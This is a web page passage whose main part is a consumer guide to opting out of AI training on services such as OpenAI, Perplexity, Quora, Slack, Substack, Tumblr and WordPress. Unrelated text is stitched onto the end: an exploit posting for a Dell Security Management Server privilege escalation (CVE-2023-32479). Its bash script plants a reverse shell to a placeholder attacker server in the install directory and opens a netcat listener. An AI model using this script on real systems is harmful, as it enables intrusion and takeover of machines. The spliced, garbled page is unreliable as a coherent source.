On its help pages, OpenAI says ChatGPT web users without accounts should navigate to **Settings** and then uncheck **Improve the model for everyone**. If you have an account and are logged in through a web browser, select **ChatGPT, Settings, Data Controls,** and then turn off **Chat History & Training**. If you’re using ChatGPT’s mobile apps, go to **Settings**, pick **Data Controls,** and turn off **Chat History & Training**. Changing these settings, OpenAI’s support pages say, won’t sync across different browsers or devices, so you need to make the change everywhere you use ChatGPT.

OpenAI is about a lot more than ChatGPT. For its Dall-E 3 image generator, the startup has a **form that allows you to send images** to be removed from “future training datasets.” It asks for your name, email, whether you own the image rights or are getting in touch on behalf of a company, details of the image, and any uploads of the image(s). OpenAI also says if you have a “high volume” of images hosted online that you want removed from training data, then it may be “more efficient” to add GPTBot to the robots.txt file of the website where the images are hosted.

Traditionally a website’s robots.txt file—a simple text file that usually sits at websitename.com/robots.txt—has been used to tell search engines, and others, whether they can include your pages in their results. It can now also be used to tell AI crawlers not to scrape what you have published—and AI companies have said they’ll honor this arrangement.

Perplexity

Perplexity is a startup that uses AI to help you search the web and find answers to questions. Like all of the other software on this list, you are automatically opted in to having your interactions and data used to train Perplexity’s AI further. Turn this off by clicking on your **account name**, scrolling down to the **Account** section, and turning off the **AI Data Retention** toggle.

Quora

Quora via Matt Burgess

Quora says it “currently” doesn’t use answers to people’s questions, posts, or comments for training AI. It also hasn’t sold any user data for AI training, a spokesperson says. However, it does offer opt-outs in case this changes in the future. To do this, visit its **Settings** page, click to **Privacy,** and turn off the “**Allow large language models to be trained on your content**” option. Despite this choice, there are some Quora posts that may be used for training LLMs. If you reply to a machine-generated answer, the company’s help pages say, then those answers may be used for AI training. It points out that third parties may just scrape its content anyway.

Rev

Rev, a voice transcription service that uses both human freelancers and AI to transcribe audio, says it uses data “perpetually” and “anonymously” to train its AI systems. Even if you delete your account, it will still train its AI on that information.

Kendell Kelton, head of brand and corporate communications at Rev, says it has the “largest and most diverse data set of voices,” made up of more than 6.5 million hours of voice recording. Kelton says Rev does not sell user data to any third parties. The firm’s terms of service say data will be used for training, and that customers are able to opt out. People can opt out of their data being used by **sending an email** to support@rev.com, its help pages say.

Slack

All of those random Slack messages at work might be used by the company to train its models as well. “Slack has used machine learning in its product for many years. This includes platform-level machine-learning models for things like channel and emoji recommendations,” says Jackie Rocca, a vice president of product at Slack who’s focused on AI.

Even though the company does not use customer data to train a large language model for its Slack AI product, Slack may use your interactions to improve the software’s machine-learning capabilities. “To develop AI/ML models, our systems analyze Customer Data (e.g. messages, content, and files) submitted to Slack,” says Slack’s privacy page. Similar to Adobe, there’s not much you can do on an individual level to opt out if you’re using an enterprise account.

The only real way to opt out is to have your administrator email Slack at feedback@slack.com. The message must have the subject line “Slack Global model opt-out request” and include your organization's URL. Slack doesn’t provide a timeline for how long the opt-out process takes, but it should send you a confirmation email after it’s complete.

Squarespace

Website-building tool Squarespace has built in a toggle to stop AI crawlers from scraping websites it hosts. This works by updating your website’s robots.txt file to tell AI companies the content is off limits. To block the AI bots, open **Settings** within your account, find **Crawlers**, and turn off **Artificial Intelligence Crawlers**. It points out this should work for the following crawlers: Anthropic, OpenAI’s GPTBot and ChatGPT-User, Google Extended, and CCBot.

Substack

If you use Substack for blog posts, newsletters, or more, the company also has an easy option to apply the robots.txt opt-out. Within your **Settings** page, scroll to the **Publication** section and turn on the toggle to **Block AI training**. Its help page points out: “This will only apply to AI tools that respect this setting.”

Tumblr

Blogging and publishing platform Tumblr—owned by Automattic, which also owns WordPress—says it is “working with” AI companies that are “interested in the very large and unique set of publicly published content” on the wider company’s platforms. This doesn’t include user emails or private content, an Automattic spokesperson says.

Tumblr has a “prevent third-party sharing” option to stop what you publish being used for AI training, as well as being shared with other third parties such as researchers. If you’re using the Tumblr app, go to account S**ettings**, select your blog, click on the **gear icon**, select **Visibility**, and toggle the “**Prevent third-party sharing**” option. Explicit posts, deleted blogs, and those that are password-protected or private, are not shared with third-party companies in any case, Tumblr’s support pages say.

WordPress

Wordpress via Matt Burgess

Like Tumblr, WordPress has a “prevent third-party sharing” option. To turn this on, visit your website’s dashboard, click on **Settings**, **General**, and then through to **Privacy**, select the **Prevent third-party sharing** box. “We are also trying to work with crawlers (like https://commoncrawl.org/) to prevent content from being scraped and sold without giving our users choice or control over how their content is used,” an Automattic spokesperson says.

Your Website

If you are hosting your own website, you can update your robots.txt file to tell AI bots not to scrape the pages. Most news websites don’t allow their articles to be crawled by AI bots. WIRED’s robots.txt file, for example, doesn’t allow bots from OpenAI, Google, Amazon, Facebook, Anthropic, or Perplexity, among others. This opt-out isn’t just for publishers though: Any website, big or small, can alter its robots file to exclude AI crawlers. All you need to do is add a disallow command; working examples can be found here.

How to Stop Your Data From Being Used to Train AI

Dell Security Management Server versions prior to 11.9.0 suffer from a local privilege escalation vulnerability.

    # Exploit Title: [title] Dell Security Management Server versions prior to11.9.0# Exploit Author: [author] Amirhossein Bahramizadeh# CVE : [if applicable] CVE-2023-32479Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell SecurityManagementServer versions prior to 11.9.0 contain privilege escalation vulnerabilitydue to improper ACL of the non-default installation directory. A localmalicious user could potentially exploit this vulnerability by replacingbinaries in installed directory and taking the reverse shell of the systemleading to Privilege Escalation.#!/bin/bashINSTALL_DIR="/opt/dell"# Check if the installed directory has improper ACLsif [ -w "$INSTALL_DIR" ]; then    # Replace a binary in the installed directory with a malicious binary that opens a reverse shell    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"    chmod +x "$INSTALL_DIR/dell-exploit"    # Wait for the reverse shell to connect to your malicious server    nc -lvnp 1234fi

Tag

#dell